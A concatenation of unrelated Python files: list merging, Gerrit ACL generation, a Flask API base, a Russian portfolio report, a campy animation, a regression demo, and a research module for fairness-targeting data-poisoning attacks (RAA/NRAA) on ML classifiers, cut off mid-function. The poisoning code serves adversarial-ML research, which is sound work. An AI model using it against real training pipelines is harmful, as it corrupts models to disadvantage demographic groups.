# the converter pops it and move movp to the place of current value
# in mergedl
# initialization: the original lcs order value has been used to decide
# the begin of following loop
isEmpty = False
del lcsOrder[0]
# the lcsOrder is empty
if lcsOrder == []:
topVal, isEmpty = 0, True
else:
topVal = lcsOrder[0]
# start from the first value after the first lcs value on mergedl
startIdx = first_lcs_val_idx_in_insl+1
for insert_idx in range(startIdx, len(insl)):
# the current value of >> insl <<
current_val = insl[insert_idx]
# if the current value is in the lcsOrder, move the movp to
# the place of current value in >> mergedl <<
if current_val == topVal and not isEmpty:
# remove topVal from lcs order and update topVal
lcsOrder.remove(topVal)
if lcsOrder == []:
pass
else:
topVal = lcsOrder[0]
# move movp to current_val in >> mergedl <<
for i in range(movp,len(mergedl)):
if mergedl[i] == current_val:
# move to the next place after current value in >> mergedl <<
movp = i+1
break
# if not found, raise error(this program has bug, please contact me)
if i == len(mergedl)-1:
print "Error: current_val not found in mergedl."
return
# otherwise, insert it to >> mergedl <<
else:
mergedl.insert(movp, current_val)
movp += 1
return mergedl
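# --- Illustrative example (not part of the original file) ---------------------
# A small worked example of merge(), assuming lcs() returns [[2, 3]] for these
# two topological orders:
#
#   merge([1, 2, 3, 4], [2, 5, 3])
#   # basel = [1, 2, 3, 4], insl = [2, 5, 3], the first set is empty, and
#   # 5 is inserted between the common LCS values 2 and 3:
#   # -> [1, 2, 5, 3, 4]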
""" Merge files on assigned directory
"""
def run_merge_sfcs(sfc_files, result_f_name, test_num):
start = datetime.datetime.now()
"""merge mechanism:"""
# copy the first sfc
f1_name, fidx = sfc_files[0], 0
cmd = "cp -r %s %s" % (f1_name, result_f_name)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print "\nError occurred as copying result.txt.\n"
print output
return
# merge other sfcs, and store the results on "results.txt"(result_f)
# merge time = total number of DAG -1
mergeTime, mergedl = test_num-1, []
for i in range(mergeTime):
# open result_f and current file
result_f = open(result_f_name)
fidx = i+1
f_name = sfc_files[fidx]
f = open(f_name)
# read contents from result_f and current file
content1 = result_f.read().split("\n")
l1 = [int(j) for j in content1[0].split(",")]
content2 = f.read().split("\n")
l2 = [int(j) for j in content2[0].split(",")]
# close files
result_f.close()
f.close()
# merge two lists
mergedl = merge(l1,l2)
if mergedl == None:
print "Error: mergedl is empty!"
print "Some errors occurred in merge(), libMerge.py"
break
# write mergedl to result_f
mergedl_str = ""
for s in mergedl:
mergedl_str += str(s)
mergedl_str += ","
mergedl_str = mergedl_str[:-1]
print mergedl, '\n'
cmd = "echo %s > %s" % (mergedl_str, result_f_name)
status, output = commands.getstatusoutput(cmd)
if status != 0:
print "\nError occurred as writing merged topoOrder!\n"
print output
return
end = datetime.datetime.now()
print "Total time:", (end-start)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='libMerge.py')
parser.add_argument('-n', '--num', help='Test number',
type=int, action="store", default=2)
parser.add_argument('-d', '--dir', help='Output directory name',
type=str, action="store", default="test")
args = parser.parse_args()
if args.dir[-1] != "/":
args.dir += "/"
# get all the sfcs described in .txt files
requests = os.listdir(args.dir)
sfc_files = []
for item in requests:
# ignore non-request
if ".txt" not in item:
continue
f_name = args.dir+item
sfc_files.append(f_name)
result_f_name = args.dir+"result.txt"
run_merge_sfcs(sfc_files, result_f_name, args.num)
|
#!/bin/env python3
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import yaml
import argparse
DEFAULT_ACL = """
[access "refs/*"]
owner = group {repo}-core
[access "refs/heads/*"]
label-Code-Review = -2..+2 group {repo}-core
label-Verified = -2..+2 group {repo}-core
label-Workflow = -1..+1 group {repo}-core
label-Workflow = -1..+0 group Registered Users
submit = group {repo}-core
read = group Registered Users
[access "refs/meta/config"]
read = group {repo}-core
read = group Registered Users
[receive]
requireChangeId = true
[submit]
mergeContent = false
action = fast forward only
"""
def usage():
p = argparse.ArgumentParser()
p.add_argument("--repo", action='append')
p.add_argument("--core")
p.add_argument("output")
return p.parse_args()
def main():
args = usage()
name = args.repo[0]
resources = {
'repos': {
name: {
'description': 'The %s repository' % name,
'acl': '%s-acl' % name
}
},
'acls': {
'%s-acl' % name: {
'file': DEFAULT_ACL.format(repo=name),
'groups': ['%s-core' % name]
}
},
'groups': {
'%s-core' % name: {
'description': 'The %s core group' % name,
'members': [args.core]
}
}
}
if len(args.repo) > 1:
for repo in args.repo[1:]:
resources['repos'][repo] = {
'description': 'The %s repository' % repo,
'acl': '%s-acl' % name
}
with open(args.output, "w") as of:
yaml.safe_dump({'resources': resources}, of, default_flow_style=False)
if __name__ == "__main__":
main()
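# --- Illustrative example (not part of the original file) ---------------------
# A minimal sketch of how this script could be invoked (the script name is
# hypothetical):
#
#   python create_repo_resources.py --repo myrepo --core jdoe resources.yaml
#
# which would dump a YAML document roughly of the form (keys sorted by
# yaml.safe_dump, the acl file being DEFAULT_ACL rendered for "myrepo"):
#
#   resources:
#     acls:
#       myrepo-acl:
#         file: <DEFAULT_ACL with {repo} replaced by "myrepo">
#         groups:
#         - myrepo-core
#     groups:
#       myrepo-core:
#         description: The myrepo core group
#         members:
#         - jdoe
#     repos:
#       myrepo:
#         description: The myrepo repository
#         acl: myrepo-acl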
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Copyright 2012 Red Hat, Inc.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Translation support for messages in this library.
"""
import oslo_i18n
from oslo_i18n import _factory
# Create the global translation functions.
_translators = _factory.TranslatorFactory(domain='myapp')
# The primary translation function using the well-known name "_"
_ = _translators.primary
_C = _translators.contextual_form
_P = _translators.plural_form
_LI = _translators.log_info
_LW = _translators.log_warning
_LE = _translators.log_error
_LC = _translators.log_critical
|
Ctx = {}
|
import json
import os
import shutil
from flask import current_app, jsonify
from flask_restful import Resource, marshal
from flask_restful.fields import Raw
import analysisweb_user
from analysisweb.api import db
from analysisweb_user.models import MetaDataException
class IDField(Raw):
def format(self, value):
return {"id": value.id, "label": value.label}
class ResourceInvalidInputException(Exception):
response_code = 400
def __init__(self, *args, **kwargs):
Exception.__init__(self, *args, **kwargs)
db.session.rollback()
class ResourceNotFoundException(Exception):
response_code = 404
class ResourceForbiddenActionException(Exception):
response_code = 405
class ResourceBase(Resource):
db_table = None
fields = None
def get_all(self):
return [marshal(m, self.fields) for m in self.db_table.query.all()]
def get_resource(self, id_, table=None):
table = table or self.db_table
try:
id_ = int(id_)
except ValueError:
raise ResourceInvalidInputException("Item ID is not a valid integer")
try:
resource = table.query.get(id_)
except Exception as e: # noqa
raise ResourceNotFoundException(
"Item could not be retrieved from database: {}".format(e)
)
if resource is None:
raise ResourceNotFoundException("Item does not exists in the database")
else:
return resource
def delete_resource(self, base_path, db_resource):
if hasattr(db_resource, "jobs") and db_resource.jobs:
raise ResourceForbiddenActionException(
"Item cannot be removed because it is associated with a job"
)
json_resource = self.dump_resource(db_resource)
shutil.rmtree(os.path.join(base_path, str(db_resource.id)))
db_resource.clean_up(db.session)
db.session.delete(db_resource)
db.session.commit()
return json_resource
def dump_resource(self, db_resource):
return marshal(db_resource, self.fields)
@staticmethod
def load_metadata(metadata, db_resource):
if metadata is None:
return
meta_data = json.loads(metadata)
if meta_data:
try:
db_resource.meta_data = meta_data
except MetaDataException as e:
raise ResourceInvalidInputException("Invalid metadata: {}".format(e))
class MetaResource(Resource):
@staticmethod
def load_meta(filename):
path = os.path.abspath(os.path.dirname(analysisweb_user.__file__))
meta_filename = os.path.join(path, filename)
with open(meta_filename, "r") as f:
meta = json.load(f)
current_app.config[
"JSON_SORT_KEYS"
] = False # This is not recommended by Flask but done here locally
meta = jsonify(meta)
current_app.config["JSON_SORT_KEYS"] = True
return meta
|
"""Расчет дивидендов и дохода начиная с определенной даты в пересчете на неделю, месяц и год."""
import pandas as pd
from poptimizer.data.views import indexes
from poptimizer.reports import pdf, pdf_middle
def get_investor_data(file_name: str, investor_name: str) -> pd.DataFrame:
"""Формирует DataFrame с вкладами, стоимостью активов и дивидендами инвестора."""
df = pdf.read_data(file_name)
value_column = "Value_" + investor_name
investor_share = df[value_column] / df["Value"]
df["Dividends"] = df["Dividends"] * investor_share
df = df[[investor_name, value_column, "Dividends"]]
df.columns = ["Inflow", "Value", "Dividends"]
return df
def constant_prices_data(report_name: str, investor_name: str, months: int) -> pd.DataFrame:
"""Переводит данные в постоянные цены."""
df = get_investor_data(report_name, investor_name)
df = df.iloc[-months - 1 :]
cpi = indexes.cpi(df.index[-1])
cpi = cpi[-len(df) :]
cpi = cpi.cumprod()
cpi = cpi.iloc[-1] / cpi
return df.mul(cpi.values, axis="index")
def rescale_and_format(x: float, divider: float) -> str:
"""Текстовое представление данных.
Умножает на множитель и форматирует с округлением до тысяч, разделением разрядов и
выравниванием вправо."""
return f"{round(x / divider, -3):,.0f}".replace(",", " ").rjust(9)
def income(report_name: str, investor_name: str, months: int):
"""Распечатывает дивиденды и доход с начальной даты в среднем за год, месяц и неделю.
Данные пересчитываются в постоянные цена на основе CPI для сопоставимости на длительных
промежутках времени.
:param report_name:
Наименование файла с отчетом, из которого берутся исторические данные.
:param investor_name:
Имя инвестора, для которого осуществляется расчет.
:param months:
Количество месяцев, за которые анализируется статистика.
"""
df = constant_prices_data(report_name, investor_name, months)
dividends = df["Dividends"].iloc[1:].sum()
incomes = df["Value"].iloc[-1] - df["Value"].iloc[0] - df["Inflow"].iloc[1:].sum()
months = len(df) - 1
periods = dict(Y=months / 12, M=months, W=(months / 12) * 365.25 / 7)
print(f"\n{investor_name} в среднем (с коррекцией на инфляцию) за {months} месяцев:")
for period, divider in periods.items():
print(
f"1{period}:",
f"Дивиденды = {rescale_and_format(dividends, divider)},",
f"Доход = {rescale_and_format(incomes, divider)}",
)
def monthly_returns(report_name: str, months: int) -> pd.DataFrame:
"""Необходимое количество месяцев для анализа."""
df = pdf_middle.portfolio_cum_return(pdf.read_data(report_name).iloc[-months - 1 :])
df = pd.concat([df, pdf_middle.index_cum_return(df)], axis=1).pct_change().dropna()
df.columns = ["Portfolio", "MOEX"]
return df
def stats(report_name: str, months: int):
"""Отчет ос статистических свойствах портфеля в сравнении с рынком.
:param report_name:
Наименование файла с отчетом, из которого берутся исторические данные.
:param months:
Количество месяцев, за которые анализируется статистика.
"""
df = monthly_returns(report_name, months)
results = dict()
results["MEAN"] = df.mean() * 12
results["STD"] = df.std() * 12 ** 0.5
results[""] = ["", ""]
results["G_MEAN"] = df.add(1).product(axis=0) ** (12 / len(df)) - 1
results["PROXI"] = results["MEAN"] - results["STD"] ** 2 / 2
results["Sharpe"] = results["MEAN"] / results["STD"]
results = pd.DataFrame(results).T
print(f"\n{results}")
def history(report_name: str, investor_name: str, months: int):
"""Распечатывает историческую статистику за определенное число месяцев дял инвестора и портфеля.
:param report_name:
Наименование файла с отчетом, из которого берутся исторические данные.
:param investor_name:
Имя инвестора, для которого осуществляется расчет.
:param months:
Количество месяцев, за которые анализируется статистика.
"""
income(report_name, investor_name, months)
stats(report_name, months)
|
"""
File: bouncing_ball.py
Name: 賴珈汶
-------------------------
TODO: When the user clicks, the ball will fall and bounce.
When the ball passes the right wall, it will return to its initial position.
"""
from campy.graphics.gobjects import GOval
from campy.graphics.gwindow import GWindow
from campy.gui.events.timer import pause
from campy.gui.events.mouse import onmouseclicked
VX = 3
DELAY = 10
GRAVITY = 1
SIZE = 20
REDUCE = 0.9
START_X = 30
START_Y = 40
OVER_WINDOW = 3
over_window = 0
window = GWindow(800, 500, title='bouncing_ball.py')
ball = GOval(SIZE, SIZE, x=START_X, y=START_Y)
ball.filled = True
window.add(ball)
def main():
"""
This program simulates a bouncing ball at (START_X, START_Y)
that has VX as x velocity and 0 as y velocity. Each bounce reduces
y velocity to REDUCE of itself.
"""
onmouseclicked(move)
def move(mouse):
"""
The ball falls and bounces when the user clicks. When it passes the
right edge of the window, it returns to its initial position.
"""
vy = 0
global over_window
ball_at_start = window.get_object_at(START_X, START_Y)
if ball_at_start is not None and over_window < OVER_WINDOW:
while True:
ball.move(VX, vy)
vy += GRAVITY
if ball.y+ball.height >= window.height:
vy = -vy * REDUCE
pause(DELAY)
if ball.x >= window.width:
ball.x = START_X
ball.y = START_Y
over_window += 1
break
if __name__ == "__main__":
main()
|
from .BayesGau import *
|
from garage.regressors.product_regressor import ProductRegressor
__all__ = ["ProductRegressor"]
|
# -*- coding: UTF-8 -*-
"""
This script compares LAD linear regression with OLS linear regression
"""
import statsmodels.api as sm
from sklearn import linear_model
from statsmodels.regression.quantile_regression import QuantReg
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
def generate_data():
"""
Randomly generate the data
"""
np.random.seed(4889)
# range() behaves differently in Python 2 and Python 3, so use list(range(10, 29))
x = np.array([10] + list(range(10, 29)))
error = np.round(np.random.randn(20), 2)
y = x + error
# Add an outlier
x = np.append(x, 29)
y = np.append(y, 29 * 10)
return pd.DataFrame({"x": x, "y": y})
def train_OLS(x, y):
"""
Train the OLS linear regression model and return its predictions
"""
model = linear_model.LinearRegression()
model.fit(x, y)
re = model.predict(x)
return re
def train_LAD(x, y):
"""
Train the LAD linear regression model and return its predictions
"""
X = sm.add_constant(x)
model = QuantReg(y, X)
model = model.fit(q=0.5)
re = model.predict(X)
return re
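# Note (added): QuantReg fitted at q=0.5 is median regression, which minimizes the
# sum of absolute residuals (the LAD criterion); this is why it is far less
# sensitive than OLS to the outlier added in generate_data().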
def visualize_model(x, y, ols, lad):
"""
Visualize the model results
"""
# Create a figure
fig = plt.figure(figsize=(6, 6), dpi=80)
# Draw a single subplot in the figure
ax = fig.add_subplot(111)
# Configure the axes
ax.set_xlabel("$x$")
ax.set_xticks(range(10, 31, 5))
ax.set_ylabel("$y$")
# Draw a scatter plot with blue, semi-transparent points
ax.scatter(x, y, color="b", alpha=0.4)
# Visualize the model results
# A red dashed line shows the OLS linear regression result
ax.plot(x, ols, 'r--', label="OLS")
# A black solid line shows the LAD linear regression result
ax.plot(x, lad, 'k', label="LAD")
plt.legend(shadow=True)
# Show the figure. This blocks execution until all figure windows are closed
# In a Python shell, you can pass "block=False" to disable blocking
plt.show()
def OLS_vs_LAD(data):
"""
Compare the differences between the OLS and LAD models
"""
features = ["x"]
label = ["y"]
ols = train_OLS(data[features], data[label])
lad = train_LAD(data[features], data[label])
visualize_model(data[features], data[label], ols, lad)
if __name__ == "__main__":
data = generate_data()
OLS_vs_LAD(data)
|
import pandas as pd
data_frame = {'name' : ['1'], 'email':['2'], 'phone':['3']}
df = pd.DataFrame(data=data_frame, index = ["we're on the way to success"])
print(df)
df.to_csv('contact_list_magic.csv')
#####
# import tkinter
# tkinter.messagebox.
# print(tkinter.ACTIVE)
|
from __future__ import division
from __future__ import print_function
from __future__ import absolute_import
from __future__ import unicode_literals
import time
import numpy as np
import os
import defenses
import data_utils as data
import cvxpy as cvx
import tensorflow as tf
import random
def poison_with_influence_proj_gradient_step(model, general_train_idx,
sensitive_file, attack_method, advantaged, test_idx, indices_to_poison,
projection_fn,
step_size=0.01,
shrink_towards='cluster_center',
loss_type='normal_loss',
force_refresh=True,
test_description=None,
output_root=None):
"""
Returns poisoned_X_train, a subset of model.train_dataset (marked by indices_to_poison)
that has been modified by an attack iteration step.
"""
train_dataset = model.train_dataset
validation_dataset = model.validation_dataset
test_dataset = model.test_dataset
if test_description is None:
test_description = test_idx
grad_filename = os.path.join(output_root, 'grad_influence_wrt_input_val_%s_testidx_%s.npy' % (
model.model_name, test_description))
if (force_refresh == False) and (os.path.exists(grad_filename)):
grad_influence_wrt_input_val = np.load(grad_filename)
else:
grad_influence_wrt_input_val = model.get_grad_of_influence_wrt_input(
indices_to_poison,
test_idx,
verbose=False,
force_refresh=force_refresh,
test_description=test_description,
loss_type=loss_type)
poisoned_X_train = train_dataset.x[indices_to_poison, :]
poisoned_X_train -= step_size * grad_influence_wrt_input_val
poisoned_labels = train_dataset.labels[indices_to_poison]
weights = model.sess.run(model.weights)
if(attack_method == "RAA"):
DATA_FOLDER = './data'
dataset_path = os.path.join(DATA_FOLDER)
f = np.load(os.path.join(dataset_path, sensitive_file))
group_label = f['group_label']
male_train_index = np.where(group_label[0:general_train_idx] == 0)[
0].astype(np.int32)
female_train_index = np.where(group_label[0:general_train_idx] == 1)[
0].astype(np.int32)
male_test_index = np.where(group_label[general_train_idx:] == 0)[
0].astype(np.int32)
female_test_index = np.where(group_label[general_train_idx:] == 1)[
0].astype(np.int32)
gender_labels = np.zeros(train_dataset.labels.shape[0])
for k in range(general_train_idx):
if(k in male_train_index):
gender_labels[k] = 1
elif(k in female_train_index):
gender_labels[k] = -1
if(advantaged == -1):
op_indx = np.where((train_dataset.labels == -1)
& (gender_labels == -1))[0]
else:
op_indx = np.where((train_dataset.labels == -1)
& (gender_labels == 1))[0]
rand1 = random.randint(0, op_indx.shape[0] - 1)
print("Hello\n" * 3)
print(rand1)
poisoned_X_train[0] = train_dataset.x[op_indx[rand1], :]
if(advantaged == -1):
op_indx = np.where((train_dataset.labels == 1)
& (gender_labels == 1))[0]
else:
op_indx = np.where((train_dataset.labels == 1)
& (gender_labels == -1))[0]
rand2 = random.randint(0, op_indx.shape[0] - 1)
poisoned_X_train[1] = train_dataset.x[op_indx[rand2], :]
elif(attack_method == "NRAA"):
DATA_FOLDER = './data'
dataset_path = os.path.join(DATA_FOLDER)
f = np.load(os.path.join(dataset_path, sensitive_file))
group_label = f['group_label']
male_train_index = np.where(group_label[0:general_train_idx] == 0)[
0].astype(np.int32)
female_train_index = np.where(group_label[0:general_train_idx] == 1)[
0].astype(np.int32)
male_test_index = np.where(group_label[general_train_idx:] == 0)[
0].astype(np.int32)
female_test_index = np.where(group_label[general_train_idx:] == 1)[
0].astype(np.int32)
gender_labels = np.zeros(train_dataset.labels.shape[0])
for k in range(general_train_idx):
if(k in male_train_index):
gender_labels[k] = 1
elif(k in female_train_index):
gender_labels[k] = -1
if(advantaged == -1):
op_indx = np.where((train_dataset.labels == -1)
& (gender_labels == -1))[0]
else:
op_indx = np.where((train_dataset.labels == -1)
& (gender_labels == 1))[0]
maxdist = 0
maxpoint = 0
for points in range(op_indx.shape[0]):
temp = 0
for p in range(op_indx.shape[0]):
if(np.allclose(train_dataset.x[op_indx[points], :], train_dataset.x[op_indx[p], :], rtol=0, atol=1)):
temp = temp + 1
if(temp > maxdist):
maxdist = temp
maxpoint = points
poisoned_X_train[0] = train_dataset.x[op_indx[maxpoint], :]
if(advantaged == -1):
op_indx = np.where((train_dataset.labels == 1)
& (gender_labels == 1))[0]
else:
op_indx = np.where((train_dataset.labels == 1)
& (gender_labels == -1))[0]
maxdist = 0
maxpoint = 0
for points in range(op_indx.shape[0]):
temp = 0
for p in range(op_indx.shape[0]):
if(np.allclose(train_dataset.x[op_indx[points], :], train_dataset.x[op_indx[p], :], rtol=0, atol=3)):
temp = temp + 1
if(temp > maxdist):
maxdist = temp
maxpoint = points
poisoned_X_train[1] = train_dataset.x[op_indx[maxpoint], :]
print('weights shape is ', weights.shape)
poisoned_X_train = projection_fn(
poisoned_X_train,
poisoned_labels,
theta=weights[:-1],
bias=weights[-1])
return poisoned_X_train
def iterative_attack(
model,
general_train_idx,
sensitive_file,
attack_method,
advantaged,
indices_to_poison,
test_idx,
test_description=None,
step_size=0.01,
num_iter=10,
loss_type='normal_loss',
projection_fn=None,
output_root=None,
num_copies=None,
stop_after=3,
start_time=None,
display_iter_time=False,
stopping_method='Accuracy'):
"""
Performs the main specified adversarial attack
:param model: Model to attack
:general_train_idx: Index of last element in the training data
:sensitive_file: File specifying the sensitive group labels (dataset_group_label)
:attack_method: Used attack method
:advantaged: Index of advantaged group (1 or -1)
:indices_to_poison: Indices to be poisoned
:test_idx: Deprecated
:test_description: Deprecated
:step_size: Step size for attacks with adversarial loss
:num_iter: Maximum number of attack iterations
:loss_type: Loss type for the different attacks (adversarial_loss when an adversarial loss is used, otherwise normal_loss)
:projection_fn: Projection function to project updated poisoned points to feasible set
:output_root: Output root directory
:num_copies: Number of copies to make for poisoned points
:stop_after: Patience for stopping training
:start_time: Start time of training
:display_iter_time: Print time of every iteration if true
:stopping_method: Method to evaluate best model
"""
if num_copies is not None:
assert len(num_copies) == 2
assert np.min(num_copies) >= 1
assert len(indices_to_poison) == 2
assert indices_to_poison[1] == (indices_to_poison[0] + 1)
assert indices_to_poison[1] + num_copies[0] + \
num_copies[1] == (model.train_dataset.x.shape[0] - 1)
assert model.train_dataset.labels[indices_to_poison[0]] == 1
assert model.train_dataset.labels[indices_to_poison[1]] == -1
copy_start = indices_to_poison[1] + 1
assert np.all(
model.train_dataset.labels[copy_start:copy_start + num_copies[0]] == 1)
assert np.all(model.train_dataset.labels[copy_start + num_copies[0]:copy_start + num_copies[0] + num_copies[1]] == -1)
largest_test_loss = 0
largest_parity = 0
stop_counter = 0
print('Test idx: %s' % test_idx)
if start_time is not None:
assert num_copies is not None
times_taken = np.zeros(num_iter)
Xs_poison = np.zeros(
(num_iter, len(indices_to_poison), model.train_dataset.x.shape[1]))
Ys_poison = np.zeros((num_iter, len(indices_to_poison)))
nums_copies = np.zeros((num_iter, len(indices_to_poison)))
for attack_iter in range(num_iter):
since = time.time()
print(num_iter)
print('*** Iter: %s' % attack_iter)
model.attack_iter = attack_iter
# Create modified training dataset
old_poisoned_X_train = np.copy(
model.train_dataset.x[indices_to_poison, :])
poisoned_X_train_subset = poison_with_influence_proj_gradient_step(
model,
general_train_idx,
sensitive_file,
attack_method,
advantaged,
test_idx,
indices_to_poison,
projection_fn,
step_size=step_size,
loss_type=loss_type,
force_refresh=True,
test_description=test_description,
output_root=output_root)
if num_copies is not None:
poisoned_X_train = model.train_dataset.x
poisoned_X_train[indices_to_poison, :] = poisoned_X_train_subset
copy_start = indices_to_poison[1] + 1
poisoned_X_train[copy_start:copy_start +
num_copies[0], :] = poisoned_X_train_subset[0, :]
poisoned_X_train[copy_start + num_copies[0]:copy_start +
num_copies[0] + num_copies[1], :] = poisoned_X_train_subset[1, :]
else:
poisoned_X_train = np.copy(model.train_dataset.x)
poisoned_X_train[indices_to_poison, :] = poisoned_X_train_subset
# Measure some metrics on what the gradient step did
labels = model.train_dataset.labels
dists_sum = 0.0
poisoned_dists_sum = 0.0
poisoned_mask = np.array([False] * len(labels), dtype=bool)
poisoned_mask[indices_to_poison] = True
if(attack_method != "RAA" and attack_method != "NRAA"):
for y in set(labels):
cluster_center = np.mean(
poisoned_X_train[labels == y, :], axis=0)
dists = np.linalg.norm(
poisoned_X_train[labels == y, :] - cluster_center, axis=1)
dists_sum += np.sum(dists)
poisoned_dists = np.linalg.norm(
poisoned_X_train[(labels == y) & (poisoned_mask), :] - cluster_center, axis=1)
poisoned_dists_sum += np.sum(poisoned_dists)
dists_mean = dists_sum / len(labels)
poisoned_dists_mean = poisoned_dists_sum / len(indices_to_poison)
dists_moved = np.linalg.norm(
old_poisoned_X_train - poisoned_X_train[indices_to_poison, :], axis=1)
print('Average distance to cluster center (overall): %s' % dists_mean)
print('Average distance to cluster center (poisoned): %s' %
poisoned_dists_mean)
print('Average diff in X_train among poisoned indices = %s' %
np.mean(dists_moved))
print('Fraction of 0 gradient points: %s' %
np.mean(dists_moved == 0))
print('Average distance moved by points that moved: %s' %
np.mean(dists_moved[dists_moved > 0]))
# Update training dataset
model.update_train_x(poisoned_X_train)
# Retrain model
results = model.train()
if start_time is not None:
end_time = time.time()
times_taken[attack_iter] = end_time - start_time
Xs_poison[attack_iter, :, :] = np.copy(poisoned_X_train_subset)
Ys_poison[attack_iter,
:] = model.train_dataset.labels[indices_to_poison]
nums_copies[attack_iter, :] = num_copies
print('attack_iter', attack_iter)
print('num_iter - 1', num_iter - 1)
if ((attack_iter + 1) % 10 == 0) or (attack_iter == num_iter - 1):
print('in')
if(stopping_method == 'Accuracy'):
# Calculate test loss
test_loss = results['test_loss']
if largest_test_loss < test_loss:
print('test loss match')
largest_test_loss = test_loss
np.savez(os.path.join(output_root, '%s_attack' % (model.model_name)),
poisoned_X_train=poisoned_X_train,
Y_train=model.train_dataset.labels,
attack_iter=attack_iter + 1)
stop_counter = 0
else:
stop_counter += 1
if start_time is not None:
np.savez(os.path.join(output_root, '%s_timing' % (model.model_name)),
times_taken=times_taken,
nums_copies=nums_copies)
if(stopping_method == 'Fairness'):
# Calculate test loss
E0, Parity = results['E0'], results['Parity']
if largest_parity < E0 + Parity:
print('parity match')
largest_parity = E0 + Parity
np.savez(os.path.join(output_root, '%s_attack' % (model.model_name)),
poisoned_X_train=poisoned_X_train,
Y_train=model.train_dataset.labels,
attack_iter=attack_iter + 1)
stop_counter = 0
else:
stop_counter += 1
if start_time is not None:
np.savez(os.path.join(output_root, '%s_timing' % (model.model_name)),
times_taken=times_taken,
nums_copies=nums_copies)
# Printing time for every iter, if display_iter_time is set to True
now = time.time()
if (display_iter_time == True):
total_time = now - since
print('TOTAL ELAPSED TIME FOR ONE ITERATION \n', total_time)
if stop_counter >= stop_after:
print('STOPPING METHOD USED IS: ',
stopping_method, ' STOPPING NOW')
break
if start_time is not None:
np.savez(os.path.join(output_root, '%s_timing' % (model.model_name)),
times_taken=times_taken,
Xs_poison=Xs_poison,
Ys_poison=Ys_poison,
nums_copies=nums_copies)
def get_feasible_flipped_mask(
X_train, Y_train,
centroids,
centroid_vec,
sphere_radii,
slab_radii,
class_map,
use_slab=False):
sphere_dists_flip = defenses.compute_dists_under_Q(
X_train, -Y_train,
Q=None,
subtract_from_l2=False,
centroids=centroids,
class_map=class_map,
norm=2)
if use_slab:
slab_dists_flip = defenses.compute_dists_under_Q(
X_train, -Y_train,
Q=centroid_vec,
subtract_from_l2=False,
centroids=centroids,
class_map=class_map,
norm=2)
feasible_flipped_mask = np.zeros(X_train.shape[0], dtype=bool)
for y in set(Y_train):
class_idx_flip = class_map[-y]
sphere_radius_flip = sphere_radii[class_idx_flip]
feasible_flipped_mask[Y_train == y] = (
sphere_dists_flip[Y_train == y] <= sphere_radius_flip)
if use_slab:
slab_radius_flip = slab_radii[class_idx_flip]
feasible_flipped_mask[Y_train == y] = (
feasible_flipped_mask[Y_train == y] &
(slab_dists_flip[Y_train == y] <= slab_radius_flip))
return feasible_flipped_mask
def init_gradient_attack_from_mask(
X_train, Y_train,
epsilon,
feasible_flipped_mask,
general_train_idx,
sensitive_file,
attack_method,
use_copy=True):
"""
Calculates the advantaged group and computes initial poisoned data points and adds them to the training data.
:param X_train: training set features
:param Y_train: training set labels
:param epsilon: controlling parameter specifiying number of poisoned points to be copied such that n_poisoned = eps len(X_train)
:param feasible_flipped_mask: Mask of feasible set
:param general_train_idx: Index of last element in X_train
:param sensitive_file: File specifying labels of the sensitive feature
:param attack_method: Method of attack
:param use_copy: Make copies of poisoned points if true, otherwise only one point per label gets sampled
:return:
- X_modified: X_train with added poisoned points
- Y_modified: Y_train with added poisoned points
- indices_to_poison: Indices of poisonoed datapoints
- copy_array: Array specifiying number of copies of poisoned datapoints [num_pos_copies, num_neg_copies]
- advantaged: Label of advantaged group
- test_gender_labels: Sensitive feature labels (1, -1) of test_set (needed for Solans)
"""
DATA_FOLDER = './data'
dataset_path = os.path.join(DATA_FOLDER)
f = np.load(os.path.join(dataset_path, sensitive_file))
group_label = f['group_label']
advantaged = 1
male_train_index = np.where(group_label[0:general_train_idx] == 0)[
0].astype(np.int32)
female_train_index = np.where(group_label[0:general_train_idx] == 1)[
0].astype(np.int32)
male_test_index = np.where(group_label[general_train_idx:] == 0)[
0].astype(np.int32)
female_test_index = np.where(group_label[general_train_idx:] == 1)[
0].astype(np.int32)
index_male_true_train = np.where(np.logical_and(
group_label[0:general_train_idx] == 0, Y_train == 1))[0].astype(np.int32)
index_female_true_train = np.where(np.logical_and(
group_label[0:general_train_idx] == 1, Y_train == 1))[0].astype(np.int32)
train_data_one_female_prob = group_label[0:general_train_idx][
index_female_true_train].shape[0] / female_train_index.shape[0]
train_data_one_male_prob = group_label[0:general_train_idx][
index_male_true_train].shape[0] / male_train_index.shape[0]
gender_labels = np.zeros(general_train_idx)
for k in range(general_train_idx):
if(k in male_train_index):
gender_labels[k] = 1
elif(k in female_train_index):
gender_labels[k] = -1
test_size = len(male_test_index) + len(female_test_index)
test_gender_labels = np.zeros(test_size)
for k in range(test_size):
if(k in male_test_index):
test_gender_labels[k] = 1
elif(k in female_test_index):
test_gender_labels[k] = -1
if not use_copy:
num_copies = int(np.round(epsilon * X_train.shape[0]))
idx_to_copy = np.random.choice(
np.where(feasible_flipped_mask)[0],
size=num_copies,
replace=True)
X_modified = data.vstack(X_train, X_train[idx_to_copy, :])
Y_modified = np.append(Y_train, -Y_train[idx_to_copy])
copy_array = None
indices_to_poison = np.arange(X_train.shape[0], X_modified.shape[0])
else:
num_copies = int(np.round(epsilon * X_train.shape[0]))
# Choose this in inverse class balance
num_pos_copies = int(np.round(np.mean(Y_train == -1) * num_copies))
num_neg_copies = num_copies - num_pos_copies
np.random.seed(0)
if(train_data_one_female_prob > train_data_one_male_prob):
advantaged = -1
pos_idx_to_copy = np.random.choice(
np.where(feasible_flipped_mask & (Y_train == 1) & (gender_labels == -1))[0])
neg_idx_to_copy = np.random.choice(
